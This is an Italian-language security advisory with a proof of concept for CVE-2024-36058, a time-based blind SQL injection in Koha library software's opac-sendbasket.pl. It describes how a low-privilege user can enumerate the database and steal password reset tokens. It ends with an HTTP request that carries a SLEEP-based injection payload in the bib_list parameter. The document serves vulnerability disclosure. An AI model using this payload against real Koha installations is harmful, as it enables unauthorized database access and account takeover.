
Proof-of-concept exploit e advisory per CVE-2024-36058, una SQL injection blind basata sul tempo in opac-sendbasket.pl del software bibliotecario Koha, che consente l'enumerazione autenticata del database.
ID CVE: CVE-2024-36058
Prodotto: Koha Library Software
Tipo di vulnerabilità: SQL Injection cieca basata sul tempo (CWE-89)
Punteggio CVSS: 8.1 (Alto) Autenticato
Versioni interessate: Inferiori alla 22.05.22
Crediti: Karolis Narvilas
Koha è un sistema bibliotecario integrato open-source. Esiste una vulnerabilità di SQL injection cieca basata sul tempo nella funzionalità "Send Basket" in opac/opac-sendbasket.pl. Il parametro bib_list viene passato senza sanitizzazione in una query SQL, consentendo a un attaccante di iniettare payload SQL arbitrari che causano ritardi misurabili nella risposta del server.
Un utente bibliotecario normale (con privilegi bassi) può sfruttare questa vulnerabilità senza alcuna autorizzazione elevata. Sfruttando le discrepanze nei tempi di risposta, un attaccante può enumerare il database e recuperare contenuti che dovrebbero essere riservati all'accesso privilegiato.
Impatto: Un attaccante remoto autenticato può sfruttare CVE-2024-36058 per enumerare contenuti sensibili del database, inclusa l'exploitazione del flusso di reimpostazione della password e il recupero dei token di reimpostazione della password di altri account utente per dirottarli, portando ad accesso non autorizzato e potenziale esposizione dei dati.

bib_list come mostrato di seguito:Richiesta:
POST /cgi-bin/koha/opac-sendbasket.pl HTTP/1.1
Host: {domain}
Cookie: [Low Privilege Session]
-- SNIP --
email_add=<recipient>&comment=x&bib_list=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(36)))x)--+-&csrf_token=<csrf_token>
